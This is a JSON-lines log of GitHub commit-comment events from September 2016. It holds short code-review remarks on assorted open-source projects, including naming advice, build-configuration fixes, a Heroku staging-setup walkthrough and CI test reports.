{"id":"4592405040","type":"CommitCommentEvent","actor":{"login":"ale-git"},"repo":{"name":"robotology/icub-main"},"payload":{"comment":{"id":19103828,"position":null,"line":null,"path":null,"commit_id":"3b0616ca6b81591c5414bfeda7c43d3adc92ed5d","created_at":"2016-09-20T20:52:00Z","updated_at":"2016-09-20T20:52:00Z","body":"Of course :)\r\nI've thought it would have been more fair to ask to the author before changing it.  "}},"created_at":"2016-09-20T20:52:00Z"}
{"id":"4592413427","type":"CommitCommentEvent","actor":{"login":"bodrumbilisim"},"repo":{"name":"tugbadogan/hotelmanagement"},"payload":{"comment":{"id":19103843,"position":null,"line":null,"path":null,"commit_id":"51043281519709ebe09991631276f6cce1b344fe","created_at":"2016-09-20T20:53:17Z","updated_at":"2016-09-20T20:53:17Z","body":"Tuğba selamlar\r\nSistemle ilgili nedense yapıp bırakmışsın, neden destek vermiyorsun ki? yada düzgünce bilgi vermiyorsun, sistem nedense hiç bir şekilde çalışmadı. eline sağlık."}},"created_at":"2016-09-20T20:53:17Z"}
{"id":"4592414522","type":"CommitCommentEvent","actor":{"login":"tcolgate"},"repo":{"name":"dainis/node-gcstats"},"payload":{"comment":{"id":19103845,"position":null,"line":null,"path":null,"commit_id":"e3e6ccdc8502182afd573ee7a4158f5bde981636","created_at":"2016-09-20T20:53:27Z","updated_at":"2016-09-20T20:53:27Z","body":"That looks reasonable. I didn't think I'd seen anyone unexpected values, but if it's supposed to be a bit-field , the I should definitely be seeing some. I'll verify, and update/PR if needed.\r\nThanks for extracting this code out by the way, good idea.\r\n"}},"created_at":"2016-09-20T20:53:27Z"}
{"id":"4592415494","type":"CommitCommentEvent","actor":{"login":"paceholder"},"repo":{"name":"MigFerreira/nodeeditor"},"payload":{"comment":{"id":19103847,"position":12,"line":216,"path":"src/NodeGraphicsObject.cpp","commit_id":"9ebda26996a5a9a0b98f7b20abc06b58706df80b","created_at":"2016-09-20T20:53:36Z","updated_at":"2016-09-20T20:53:36Z","body":"I noticed that Qt always sets a GraphicsObject to ```selected == true``` as soon as we click onto it -- did not know about that. Thus, this line always switches the state from selected to unselected. I need to think how to deal with that.\r\n\r\nI would also add below the call for re-drawing the graphics object:\r\n```update();```   "}},"created_at":"2016-09-20T20:53:36Z"}
{"id":"4592418776","type":"CommitCommentEvent","actor":{"login":"erin-michelle"},"repo":{"name":"jklmaynard/restaurantReview"},"payload":{"comment":{"id":19103851,"position":null,"line":null,"path":null,"commit_id":"f9ad49fc52e16fca18fae0b4e83c08eff360152a","created_at":"2016-09-20T20:54:05Z","updated_at":"2016-09-20T20:54:05Z","body":"\"DaddyWarbucks\" -- This made me laugh."}},"created_at":"2016-09-20T20:54:05Z"}
{"id":"4592420888","type":"CommitCommentEvent","actor":{"login":"26032016"},"repo":{"name":"26032016/Sam-Phiri"},"payload":{"comment":{"id":19103859,"position":null,"line":null,"path":null,"commit_id":"d89a62768a907915ab714d2f68ec5b9bba6a7f58","created_at":"2016-09-20T20:54:25Z","updated_at":"2016-09-20T20:54:25Z","body":"# Sam-Phiri\r\n## This is a markdown file\r\n### Row Labels\tEstimated Total\tActual Total\tVariance Total\tPrior Year Total\tPrior Year Variance Total\r\n#### Personnel\t$177,946 \t$174,534 \t$3,412 \t$181,136 \t$6,602 \r\n#### Office\t$90,128 \t$84,812 \t$5,316 \t$87,431 \t$2,619 \r\n#### Salespeople\t$87,818 \t$89,722 \t($1,904)\t$93,705 \t$3,983 \r\n#### Operating\t$373,382 \t$369,050 \t$4,332 \t$347,452 \t($21,598)\r\n#### Advertising\t$87,259 \t$91,738 \t($4,479)\t$95,865 \t$4,127 \r\n#### Delivery Costs\t$96,141 \t$81,995 \t$14,146 \t$80,426 \t($1,569)\r\n#### Legal and Auditing\t$82,747 \t$93,837 \t($11,090)\t$85,083 \t($8,754)\r\n#### Office supplies\t$98,722 \t$95,877 \t$2,845 \t$77,345 \t($18,532)\r\n#### Utilities\t$8,513 \t$5,603 \t$2,910 \t$8,733 \t$3,130 \r\n#### Totals\t$551,328 \t$543,584 \t$7,744 \t$528,588 \t($14,996)\r\n"}},"created_at":"2016-09-20T20:54:25Z"}
{"id":"4592420975","type":"CommitCommentEvent","actor":{"login":"jlolling"},"repo":{"name":"jlolling/talendcomp_tXmlJaxb"},"payload":{"comment":{"id":19103860,"position":null,"line":null,"path":null,"commit_id":"5cb6ce2554c570ee25223b69d3cef6ca06b73250","created_at":"2016-09-20T20:54:26Z","updated_at":"2016-09-20T20:54:26Z","body":"You have caused a dependency to Java 8 here. Could you stick with Java 7 please because Java 7 is the current minimum requirement for Talend."}},"created_at":"2016-09-20T20:54:26Z"}
{"id":"4592426887","type":"CommitCommentEvent","actor":{"login":"vanfstd"},"repo":{"name":"snabbco/snabb"},"payload":{"comment":{"id":19103873,"position":95,"line":178,"path":"src/lib/ipsec/esp.lua","commit_id":"fa01474c430dbf938feda5d5df7775b377b14fe2","created_at":"2016-09-20T20:55:19Z","updated_at":"2016-09-20T20:55:19Z","body":"Oh that ffi.new was actually a stopgap I forgot to remove when I didn't know the right place to own a temporary array for that purpose -- it should be a member of `esp_v6_decrypt` that is allocated only once. Duh.\r\n\r\nAs for the predictable complexity point, I can agree with.  At least for realtime systems that would sure be useful."}},"created_at":"2016-09-20T20:55:19Z"}
{"id":"4592430687","type":"CommitCommentEvent","actor":{"login":"bsongis"},"repo":{"name":"opentx/opentx"},"payload":{"comment":{"id":19103883,"position":null,"line":null,"path":null,"commit_id":"f03837f45d61733b1d363d82c7455d33a3b34e8e","created_at":"2016-09-20T20:55:57Z","updated_at":"2016-09-20T20:55:57Z","body":"Good catch, is this described somewhere in a datasheet (that we have to fallback to single read if multi read fails)? What about write?"}},"created_at":"2016-09-20T20:55:57Z"}
{"id":"4592432025","type":"CommitCommentEvent","actor":{"login":"neSpecc"},"repo":{"name":"codex-team/codex"},"payload":{"comment":{"id":19103884,"position":37,"line":37,"path":"public/js/bot.js","commit_id":"52ca5dc49fdaad2bb94981e74e85d95bd92babd0","created_at":"2016-09-20T20:56:11Z","updated_at":"2016-09-20T20:56:11Z","body":"может commandClicked ? чтобы было понятно, что это обработчик клика на комманду"}},"created_at":"2016-09-20T20:56:11Z"}
{"id":"4592432696","type":"CommitCommentEvent","actor":{"login":"L4BORG"},"repo":{"name":"dmulloy2/ChestShop-3"},"payload":{"comment":{"id":19103889,"position":null,"line":null,"path":null,"commit_id":"8c7594be51bc6053a30a111e8ac3c15acd280bce","created_at":"2016-09-20T20:56:18Z","updated_at":"2016-09-20T20:56:18Z","body":"@mibby yes, because CS would auto update and \"fix\" sign and also handle players with long usernames (16 chars). But in your case the UUID would still have old username (in CS user database), the issue gets even worse once another user is trying to take over old username with new UUID."}},"created_at":"2016-09-20T20:56:18Z"}
{"id":"4592437944","type":"CommitCommentEvent","actor":{"login":"kymikoloco"},"repo":{"name":"LuaDist/libjpeg"},"payload":{"comment":{"id":19103905,"position":6,"line":13,"path":"CMakeLists.txt","commit_id":"2ecab59455e228e4a8e24751e8045fbbda8b40ab","created_at":"2016-09-20T20:57:09Z","updated_at":"2016-09-20T20:57:09Z","body":"You need to specify a string as the second required parameter for the options, otherwise all of these will default to OFF.\r\nhttps://cmake.org/cmake/help/v3.0/command/option.html\r\n```\r\nOPTION(BUILD_STATIC \"Build a static library\" OFF)\r\nOPTION(BUILD_EXECUTABLES \"Build the libjpeg executables\" ON)\r\nOPTION(BUILD_TESTS \"Build the tests\" ON)\r\n```"}},"created_at":"2016-09-20T20:57:09Z"}
{"id":"4592438361","type":"CommitCommentEvent","actor":{"login":"bdyckhoff"},"repo":{"name":"bdyckhoff/advengameture"},"payload":{"comment":{"id":19103907,"position":51,"line":51,"path":"world.rb","commit_id":"e374a23fb66f20ed3e82a9ba75baba5268126a92","created_at":"2016-09-20T20:57:13Z","updated_at":"2016-09-20T20:57:13Z","body":"potentially replaced with a .move method and anyother gameworld methods - teleport?\r\ncharacter_move?"}},"created_at":"2016-09-20T20:57:13Z"}
{"id":"4592441482","type":"CommitCommentEvent","actor":{"login":"chicoxyzzy"},"repo":{"name":"kangax/compat-table"},"payload":{"comment":{"id":19103914,"position":null,"line":null,"path":null,"commit_id":"b0e34dc0c096e07ac13e682f029f5046da95493e","created_at":"2016-09-20T20:57:45Z","updated_at":"2016-09-20T20:57:45Z","body":"@zloirock @mko-io it was enabled without a flag before 55.0.2866 which was released today. I've noticed that it stopped passing tests after update but realised to not provide a new PR yet."}},"created_at":"2016-09-20T20:57:45Z"}
{"id":"4592451172","type":"CommitCommentEvent","actor":{"login":"jxchen-us"},"repo":{"name":"marklogic/marklogic-contentpump"},"payload":{"comment":{"id":19103934,"position":null,"line":null,"path":null,"commit_id":"d248388f988d4861da56b5c48a690d1d46a74c46","created_at":"2016-09-20T20:59:28Z","updated_at":"2016-09-20T20:59:28Z","body":"No.  Thanks for the good catch.  I now checked in a correct version.\r\n\r\nThis is only a problem on develop, right?"}},"created_at":"2016-09-20T20:59:28Z"}
{"id":"4592454701","type":"CommitCommentEvent","actor":{"login":"ulumulu1510"},"repo":{"name":"MarkehMe/Factions"},"payload":{"comment":{"id":19103951,"position":53,"line":904,"path":"src/com/massivecraft/factions/entity/MPlayer.java","commit_id":"be183a9153bb7b5dd14cdae0f3c100564702fa72","created_at":"2016-09-20T21:00:07Z","updated_at":"2016-09-20T21:00:07Z","body":"Here you could also do\r\n\r\nIf (!informing) return;\r\n\r\nThat would reducertainly indentation.  ;)"}},"created_at":"2016-09-20T21:00:07Z"}
{"id":"4592456005","type":"CommitCommentEvent","actor":{"login":"neSpecc"},"repo":{"name":"codex-team/codex"},"payload":{"comment":{"id":19103959,"position":38,"line":38,"path":"public/js/bot.js","commit_id":"52ca5dc49fdaad2bb94981e74e85d95bd92babd0","created_at":"2016-09-20T21:00:19Z","updated_at":"2016-09-20T21:00:19Z","body":"для понятности стоит вынести event.target в переменную.\r\n```js\r\nvar commandElement = event.target,\r\n    commandName     = commandElement.textContent;\r\n\r\nbot.sendCommand(commandName); \r\n\r\n\r\n```"}},"created_at":"2016-09-20T21:00:19Z"}
{"id":"4592458727","type":"CommitCommentEvent","actor":{"login":"IIvec"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19103970,"position":null,"line":null,"path":null,"commit_id":"21c5a51947a35cdba9bece35093b7dc32f621d1c","created_at":"2016-09-20T21:00:46Z","updated_at":"2016-09-20T21:00:46Z","body":"We know that PSQT is a 'measure' of imperfection for SF play. Maybe one idea could be to try\r\nNew PSQT = 0.95 * Old PSQT from time to time to see whether an evaluation improves."}},"created_at":"2016-09-20T21:00:46Z"}
{"id":"4592459038","type":"CommitCommentEvent","actor":{"login":"fusiyuan2010"},"repo":{"name":"percona/percona-server"},"payload":{"comment":{"id":19103971,"position":null,"line":null,"path":null,"commit_id":"c6cda8dcf40a050079140c9f07e90a05dbb67c67","created_at":"2016-09-20T21:00:49Z","updated_at":"2016-09-20T21:00:49Z","body":"Wondering when next release will come with this commit?\r\n\r\nWe faced this issue and spent a lot of time to find out the root cause. I am really looking forward to the next release and can't wait for applying to my production."}},"created_at":"2016-09-20T21:00:49Z"}
{"id":"4592463897","type":"CommitCommentEvent","actor":{"login":"vbarhatov"},"repo":{"name":"ibarhatov/HelloWorld"},"payload":{"comment":{"id":19103981,"position":11,"line":30,"path":"HelloWorld/src/com/company/Main.java","commit_id":"30b4fa22cd79b91b1d207aecb9417b168d01db05","created_at":"2016-09-20T21:01:37Z","updated_at":"2016-09-20T21:01:37Z","body":"Обрати внимание, что выражение `user.compare(one)` выполняется 2 раза подряд. Здесь ок, но если операция занимает значимое количество времени, лучше сохранить значение в переменную и затем сравнивать, присваивать"}},"created_at":"2016-09-20T21:01:37Z"}
{"id":"4592464311","type":"CommitCommentEvent","actor":{"login":"neSpecc"},"repo":{"name":"codex-team/codex"},"payload":{"comment":{"id":19103982,"position":53,"line":53,"path":"public/js/bot.js","commit_id":"52ca5dc49fdaad2bb94981e74e85d95bd92babd0","created_at":"2016-09-20T21:01:41Z","updated_at":"2016-09-20T21:01:41Z","body":"глобальная переменная?"}},"created_at":"2016-09-20T21:01:41Z"}
{"id":"4592466498","type":"CommitCommentEvent","actor":{"login":"neSpecc"},"repo":{"name":"codex-team/codex"},"payload":{"comment":{"id":19103989,"position":55,"line":55,"path":"public/js/bot.js","commit_id":"52ca5dc49fdaad2bb94981e74e85d95bd92babd0","created_at":"2016-09-20T21:02:03Z","updated_at":"2016-09-20T21:02:03Z","body":"это тоже глобальная?"}},"created_at":"2016-09-20T21:02:03Z"}
{"id":"4592467755","type":"CommitCommentEvent","actor":{"login":"L4BORG"},"repo":{"name":"dmulloy2/ChestShop-3"},"payload":{"comment":{"id":19103992,"position":null,"line":null,"path":null,"commit_id":"8c7594be51bc6053a30a111e8ac3c15acd280bce","created_at":"2016-09-20T21:02:16Z","updated_at":"2016-09-20T21:02:16Z","body":"Sorry I was half asleep when writting that... I hope it's a bit more readable now: https://github.com/dmulloy2/ChestShop-3/issues/8#issuecomment-248432695 :)"}},"created_at":"2016-09-20T21:02:16Z"}
{"id":"4592468633","type":"CommitCommentEvent","actor":{"login":"borisbstyle"},"repo":{"name":"cleanflight/cleanflight"},"payload":{"comment":{"id":19103996,"position":null,"line":null,"path":null,"commit_id":"21af8231c04489c595a6a729ec3fba61228f1197","created_at":"2016-09-20T21:02:25Z","updated_at":"2016-09-20T21:02:25Z","body":"Lol"}},"created_at":"2016-09-20T21:02:25Z"}
{"id":"4592470496","type":"CommitCommentEvent","actor":{"login":"joshuaruesweg"},"repo":{"name":"MysteryCode/de.mysterycode.translate"},"payload":{"comment":{"id":19104001,"position":58,"line":58,"path":"files/lib/system/cronjob/SyncWCFLanguageItemsCronjob.class.php","commit_id":"05b762ba5a43f97f791c7e7711f7b13abe65f871","created_at":"2016-09-20T21:02:45Z","updated_at":"2016-09-20T21:02:45Z","body":"Maybe fetch the languages with `glob(DIR.'*.xml')`? This is much nicer. ^^"}},"created_at":"2016-09-20T21:02:45Z"}
{"id":"4592470828","type":"CommitCommentEvent","actor":{"login":"neSpecc"},"repo":{"name":"codex-team/codex"},"payload":{"comment":{"id":19104002,"position":55,"line":55,"path":"public/js/bot.js","commit_id":"52ca5dc49fdaad2bb94981e74e85d95bd92babd0","created_at":"2016-09-20T21:02:49Z","updated_at":"2016-09-20T21:02:49Z","body":"и не совсем понятно: слева message (одно) , а справа Commands (много)"}},"created_at":"2016-09-20T21:02:49Z"}
{"id":"4592474878","type":"CommitCommentEvent","actor":{"login":"RayNovarina"},"repo":{"name":"RayNovarina/miado"},"payload":{"comment":{"id":19104016,"position":null,"line":null,"path":null,"commit_id":"4fd73cf52a5fda1537127fc1224386e560376a77","created_at":"2016-09-20T21:03:33Z","updated_at":"2016-09-20T21:03:33Z","body":"Setup staging server per:  \r\n1)Managing Multiple Environments for an App at \r\nhttps://devcenter.heroku.com/articles/multiple-environments\r\n2) Staging & Production Environments on Heroku at\r\nhttp://www.ralphonrails.com/rails/heroku/2014/02/04/multiple-environments-on-heroku.html\r\n\r\nI think i did the following:\r\n\r\n1)  An alternative way to create a staging application is to fork an existing application.\r\nheroku is git remote for production server. qa-miado.git will be name of git repository for  heroku:staging.\r\n  a) heroku fork --from heroku --to staging\r\n     git remote add staging https://git.heroku.com/qa-miado.git\r\n  b) Point godaddy subdomain to staging server.\r\n      qa.miado.net --> https://qa-miado.herokuapp.com/\r\n2) Create staging Rails environment setting on heroku:\r\n  a) heroku config:set RACK_ENV=staging RAILS_ENV=staging --remote staging\r\n  b) Customize the staging server as needed.\r\n      heroku config:add SLACK_CLIENT_ID='xxxxxx' --remote staging\r\n      heroku config:add SLACK_CLIENT_SECRET='xxxxx' --remote staging \r\n3) Create staging environment in Rails sources. Same db, etc. as for production BUT i created a qa Slack command via the Slack dev console. Called QA-Miado, Slack slash command is /qado. Url points to https://qa-miado.herokuapp.com\r\n     clone app/config/environments/production.rb to staging.rb \r\n     clone database.yml production section for staging section.\r\n     same cloning for secrets.yml\r\n     add staging section to application.yml with QA-Miado token info.\r\n    commit code changes to github via git push origin Create-QA-server\r\n    push to staging server:\r\n      git push staging Create-QA-server:master\r\n    handy commands to checkout the staging server:\r\n       git remote -v\r\n       heroku logs --remote staging\r\n       heroku run bash --remote staging\r\n"}},"created_at":"2016-09-20T21:03:33Z"}
{"id":"4592477059","type":"CommitCommentEvent","actor":{"login":"neSpecc"},"repo":{"name":"codex-team/codex"},"payload":{"comment":{"id":19104024,"position":81,"line":81,"path":"public/js/bot.js","commit_id":"52ca5dc49fdaad2bb94981e74e85d95bd92babd0","created_at":"2016-09-20T21:03:58Z","updated_at":"2016-09-20T21:03:58Z","body":"а selfMessage из какого скоупа?"}},"created_at":"2016-09-20T21:03:58Z"}
{"id":"4592478266","type":"CommitCommentEvent","actor":{"login":"jdef"},"repo":{"name":"mesosphere/marathon"},"payload":{"comment":{"id":19104027,"position":32,"line":287,"path":"src/main/scala/mesosphere/mesos/TaskGroupBuilder.scala","commit_id":"361689041c40ed6f309b712ce231e06632149590","created_at":"2016-09-20T21:04:10Z","updated_at":"2016-09-20T21:04:10Z","body":"this change looks wrong? unless the aforementioned MESOS issue has been resolved..."}},"created_at":"2016-09-20T21:04:10Z"}
{"id":"4592485838","type":"CommitCommentEvent","actor":{"login":"jlaw9"},"repo":{"name":"Murali-group/PathLinker-Cytoscape"},"payload":{"comment":{"id":19104046,"position":null,"line":null,"path":null,"commit_id":"929804af4840f304de33e2ac5f954117de25ca73","created_at":"2016-09-20T21:05:23Z","updated_at":"2016-09-20T21:05:23Z","body":"Fixes #9 "}},"created_at":"2016-09-20T21:05:23Z"}
{"id":"4592486487","type":"CommitCommentEvent","actor":{"login":"vheon"},"repo":{"name":"Valloric/YouCompleteMe"},"payload":{"comment":{"id":19104050,"position":51,"line":690,"path":"python/ycm/youcompleteme.py","commit_id":"30871bcebbd6ae0ca2d4766f9236dda19f40db81","created_at":"2016-09-20T21:05:30Z","updated_at":"2016-09-20T21:05:30Z","body":"upgrade your vim to at least 7.4.104"}},"created_at":"2016-09-20T21:05:30Z"}
{"id":"4592487623","type":"CommitCommentEvent","actor":{"login":"neSpecc"},"repo":{"name":"codex-team/codex"},"payload":{"comment":{"id":19104055,"position":97,"line":97,"path":"public/js/bot.js","commit_id":"52ca5dc49fdaad2bb94981e74e85d95bd92babd0","created_at":"2016-09-20T21:05:42Z","updated_at":"2016-09-20T21:05:42Z","body":"название — «Подсветить команды», а делает она что-то другое: создает элементы команд"}},"created_at":"2016-09-20T21:05:42Z"}
{"id":"4592491120","type":"CommitCommentEvent","actor":{"login":"neSpecc"},"repo":{"name":"codex-team/codex"},"payload":{"comment":{"id":19104068,"position":104,"line":104,"path":"public/js/bot.js","commit_id":"52ca5dc49fdaad2bb94981e74e85d95bd92babd0","created_at":"2016-09-20T21:06:22Z","updated_at":"2016-09-20T21:06:22Z","body":"а зачем строго задавать?"}},"created_at":"2016-09-20T21:06:22Z"}
{"id":"4592495430","type":"CommitCommentEvent","actor":{"login":"lii240"},"repo":{"name":"lii240/toshiba"},"payload":{"comment":{"id":19104080,"position":3,"line":3,"path":"README.md","commit_id":"6a4936692fd20ded34a89ce827a916135f336f23","created_at":"2016-09-20T21:07:08Z","updated_at":"2016-09-20T21:07:08Z","body":"took this bit out cos duplicate"}},"created_at":"2016-09-20T21:07:08Z"}
{"id":"4592495828","type":"CommitCommentEvent","actor":{"login":"STJEREM"},"repo":{"name":"bash/coop-rust"},"payload":{"comment":{"id":19104082,"position":4,"line":5,"path":"src/coop/time.rs","commit_id":"41a2618dbeba595eba1fd8e0a2c71ec444506cd9","created_at":"2016-09-20T21:07:11Z","updated_at":"2016-09-20T21:07:11Z","body":"It's a feature"}},"created_at":"2016-09-20T21:07:11Z"}
{"id":"4592498140","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"ruslanadotsenko/java_kurs"},"payload":{"comment":{"id":19104089,"position":22,"line":22,"path":"addressbook-web-tests/src/test/java/ru/stqa/pft/addressbook/appmanager/HelperBase.java","commit_id":"8900c49ceb926ce573c3c8021bcba6fd8c170818","created_at":"2016-09-20T21:07:36Z","updated_at":"2016-09-20T21:07:36Z","body":"клик здесь не нужен"}},"created_at":"2016-09-20T21:07:36Z"}
{"id":"4592498347","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19104091,"position":27,"line":58,"path":"static/css/material.less","commit_id":"5175464227e0812f244844bcda915f99d4859ec0","created_at":"2016-09-20T21:07:38Z","updated_at":"2016-09-20T21:07:38Z","body":"Ignore this - I worked out what it does!"}},"created_at":"2016-09-20T21:07:38Z"}
{"id":"4592500635","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"ruslanadotsenko/java_kurs"},"payload":{"comment":{"id":19104097,"position":18,"line":18,"path":"addressbook-web-tests/src/test/java/ru/stqa/pft/addressbook/tests/ContactDeletionTests.java","commit_id":"8900c49ceb926ce573c3c8021bcba6fd8c170818","created_at":"2016-09-20T21:08:05Z","updated_at":"2016-09-20T21:08:05Z","body":"Эту строку удалить"}},"created_at":"2016-09-20T21:08:05Z"}
{"id":"4592501699","type":"CommitCommentEvent","actor":{"login":"prioux"},"repo":{"name":"crocodoyle/cbrain"},"payload":{"comment":{"id":19104099,"position":42,"line":73,"path":"BrainPortal/app/controllers/custom_filters_controller.rb","commit_id":"046ad19820eaa668b6042e1f76312b1311f47bc8","created_at":"2016-09-20T21:08:16Z","updated_at":"2016-09-20T21:08:16Z","body":"Huh, why not register a single block with the `if` in it?"}},"created_at":"2016-09-20T21:08:16Z"}
{"id":"4592502236","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19104104,"position":null,"line":null,"path":null,"commit_id":"2b389aba987e8cdbc454bfaa461df26e348d4711","created_at":"2016-09-20T21:08:23Z","updated_at":"2016-09-20T21:08:23Z","body":"good one.. But please always reformat the code.. Somehow makes it so much more readable.. For instance ``int totalPrice = 0;`` instead of ``int totalPrice=0;``"}},"created_at":"2016-09-20T21:08:23Z"}
{"id":"4592506531","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19104113,"position":5,"line":15,"path":"orderTotalPriceCalculator/src/test/java/com/spark/checkout/OrderTotalPriceCalculatorTest.java","commit_id":"e215f10b240e0350ec1ca5d1a05a0661d0692570","created_at":"2016-09-20T21:09:12Z","updated_at":"2016-09-20T21:09:12Z","body":"give better name.. For instance ``oneUnitOfAShoudlCostX``"}},"created_at":"2016-09-20T21:09:12Z"}
{"id":"4592509034","type":"CommitCommentEvent","actor":{"login":"neSpecc"},"repo":{"name":"codex-team/codex"},"payload":{"comment":{"id":19104116,"position":97,"line":97,"path":"public/js/bot.js","commit_id":"52ca5dc49fdaad2bb94981e74e85d95bd92babd0","created_at":"2016-09-20T21:09:42Z","updated_at":"2016-09-20T21:09:42Z","body":"и чем это отличается от `createCmdObject` ?"}},"created_at":"2016-09-20T21:09:42Z"}
{"id":"4592509672","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19104117,"position":33,"line":31,"path":"orderTotalPriceCalculator/src/test/java/com/spark/checkout/OrderTotalPriceCalculatorTest.java","commit_id":"8f1a59c24152e6cea074bdfb23ac6abb655ef444","created_at":"2016-09-20T21:09:49Z","updated_at":"2016-09-20T21:09:49Z","body":"you can totally loose this method. Dont need this @After annotation.."}},"created_at":"2016-09-20T21:09:49Z"}
{"id":"4592511591","type":"CommitCommentEvent","actor":{"login":"damien-dd"},"repo":{"name":"idiot/unslider"},"payload":{"comment":{"id":19104121,"position":null,"line":null,"path":null,"commit_id":"bf0d5a61c057a27f20ec71e86f98e965a98b8d2d","created_at":"2016-09-20T21:10:10Z","updated_at":"2016-09-20T21:10:10Z","body":"This breaks the following feature describe in the doc.:\r\n\r\n> If a slide gets added or removed, you should call this otherwise things'll probably break. \r\n> ```\r\n> var slider = $('.my-slider').unslider();\r\n> \r\n> // I don't like this last slide, let's get rid of it\r\n> slider.find('li:last').remove();\r\n> \r\n> // Let's recalculate Unslider so it knows what's going on\r\n> slider.unslider('calculateSlides');\r\n> ```"}},"created_at":"2016-09-20T21:10:10Z"}
{"id":"4592511922","type":"CommitCommentEvent","actor":{"login":"wasdennnoch"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19104123,"position":8,"line":0,"path":"app/src/main/java/tk/wasdennnoch/androidn_ify/systemui/qs/tiles/BatteryTile.java","commit_id":"de1c685e3123a8ea29057d60468291c7bbb82df2","created_at":"2016-09-20T21:10:14Z","updated_at":"2016-09-20T21:10:14Z","body":"The SystemUI doesn't have the BATTERY_STATS permission below N and for some reason the GravityBox hook to grant the permission doesn't work on L."}},"created_at":"2016-09-20T21:10:14Z"}
{"id":"4592516453","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19104132,"position":22,"line":16,"path":"orderTotalPriceCalculator/src/main/java/com/spark/checkout/OrderTotalPriceCalculator.java","commit_id":"66e969128990a72d0f2b73eca2f02cb098a6388e","created_at":"2016-09-20T21:11:06Z","updated_at":"2016-09-20T21:11:06Z","body":"better variable names ``productQTYMap`` is bad.. How about ``productQuantityMap``  or even ``cart``"}},"created_at":"2016-09-20T21:11:06Z"}
{"id":"4592519083","type":"CommitCommentEvent","actor":{"login":"NetisGod"},"repo":{"name":"NetisGod/Business_site"},"payload":{"comment":{"id":19104136,"position":null,"line":null,"path":null,"commit_id":"3fd8e27a30a8c92b3999b93655ee1753b1017f36","created_at":"2016-09-20T21:11:34Z","updated_at":"2016-09-20T21:11:34Z","body":"awdwd"}},"created_at":"2016-09-20T21:11:34Z"}
{"id":"4592520907","type":"CommitCommentEvent","actor":{"login":"martinbudden"},"repo":{"name":"cleanflight/cleanflight"},"payload":{"comment":{"id":19104141,"position":5,"line":42,"path":"src/main/fc/fc_tasks.c","commit_id":"21af8231c04489c595a6a729ec3fba61228f1197","created_at":"2016-09-20T21:11:55Z","updated_at":"2016-09-20T21:11:55Z","body":"I don't like these macros `TASK_PERIOD_MS` and `TASK_PERIOD_HZ` - they obscure what is going on. I'd rather just see the raw number. It's not often you need to look at this code, but when you do you want to see what is actually happening."}},"created_at":"2016-09-20T21:11:55Z"}
{"id":"4592522378","type":"CommitCommentEvent","actor":{"login":"LarsAsplund"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19104150,"position":6,"line":33,"path":"src/math.vhdl","commit_id":"10eb07b7dd2e56a8fe88c75df39d57a4cb76c71a","created_at":"2016-09-20T21:12:13Z","updated_at":"2016-09-20T21:12:13Z","body":"I've avoided these interfaces for VUnit since they aren't available with the cheaper licenses. At least they didn't used to be. Do you know the latest status?\r\n  "}},"created_at":"2016-09-20T21:12:13Z"}
{"id":"4592522741","type":"CommitCommentEvent","actor":{"login":"wyseguyonline"},"repo":{"name":"Pearson-Higher-Ed/slider"},"payload":{"comment":{"id":19104155,"position":46,"line":45,"path":"main.js","commit_id":"b99185e0f1c6edd6d930f57e95ec93c3cf8261f0","created_at":"2016-09-20T21:12:16Z","updated_at":"2016-09-20T21:12:16Z","body":"We still need this event listener to keep consistent with the Origami spec components should be able to be created from an event that is fired."}},"created_at":"2016-09-20T21:12:16Z"}
{"id":"4592523163","type":"CommitCommentEvent","actor":{"login":"chrism333"},"repo":{"name":"chrism333/yalla"},"payload":{"comment":{"id":19104160,"position":20,"line":93,"path":"include/yalla/device/atmega8/avr/io.hpp","commit_id":"b19472b48a16609b4eec4342cf20f00c9190f170","created_at":"2016-09-20T21:12:21Z","updated_at":"2016-09-20T21:12:21Z","body":"Yep, the same here... 'fluctuating' is a good word for it :) but I'm actually motivated to work on this project again. So keep me posted of what your plans are and I'll do the same. However, you will probably not hear from me for a while since I'm going on vacation ;)\r\n\r\nLet me\r\nI'll be on vacation for 2 weeks+ now"}},"created_at":"2016-09-20T21:12:21Z"}
{"id":"4592523479","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19104161,"position":null,"line":null,"path":null,"commit_id":"a39cb8801b330a8be3e1d050842eb86c5d78d897","created_at":"2016-09-20T21:12:24Z","updated_at":"2016-09-20T21:12:24Z","body":"develop (mjwitte) - x86_64-MacOS-10.9-clang: OK (1764 of 1764 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a39cb8801b330a8be3e1d050842eb86c5d78d897-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a39cb8801b330a8be3e1d050842eb86c5d78d897-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-20T21:12:24Z"}
